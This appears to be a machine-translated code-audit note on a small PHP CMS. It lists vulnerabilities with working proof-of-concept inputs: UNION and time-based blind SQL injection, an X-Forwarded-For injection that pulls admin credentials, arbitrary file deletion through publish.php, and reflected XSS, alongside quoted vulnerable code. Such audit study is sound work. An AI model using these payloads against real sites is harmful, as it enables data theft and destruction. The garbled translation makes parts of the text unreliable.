ad_js sql injection
Numeric injection
1%20union%20select%201,2,3,4,5,6,(select%20user())
common.inc.php sql injection
In this document include, should be the basis of some function or configuration, so any document that contains this can be injected emmm
find publish.php, just contains the file
common.inc.php injection point:
if(!$_SESSION['user_id'])
{
if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
{
if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
{
update_user_info($_COOKIE['BLUE']['user_name']);
}
}
else if($_COOKIE['BLUE']['user_name'])
{
$user_name = $_COOKIE['BLUE']['user_name'];
$user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");
If you can not see the landing, and only $ _COOKIE [ 'BLUE'] [ 'user_name'] has a value, it will be sql query, but looks like there can only blinds
automatically jump to the landing page after a delay, in order to see the I first clearly annotated Jump:
nothing filtering, delay success
poc:
BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#
publish.php delete any file
In the 316 line:
parameters controllable $ act:
the above mentioned id also controllable, create a test page:
publish.php?act=del_pic&id=test.php
Visit again:
where any deleted files have a lot of columns on this one it ~
user.php xss
There is xss-mail at
admin / card.php xss (reflection type)
No filter name at the direct output, so you can only bomb
name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1
user.php file contains
This contains a controllable point, but mostly behind the index.php,% 00 truncation is not successful, I made reference to the online article, with
The maximum length is 256 bytes directory under Windows, Linux directory maximum length of 4096 bytes
Ideas, version 5.2, but not how are included, accounting for pit
comment.php xff injection
payload;
1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1
tpl_manage.php modify any file
user.php any jump
Perhaps that can be used ssrf what is required base64 encoding
to sum up
The first look cms, do not know where to start, a little weakness, some obvious holes or sometimes did not notice, though, that small cms code is not so complicated, the vulnerability is relatively simple and easy to use, be the first to start it, fairly small harvest, after the trial cms most important thing is to get input from the user begin to see This is just a little source of instability? (Nah)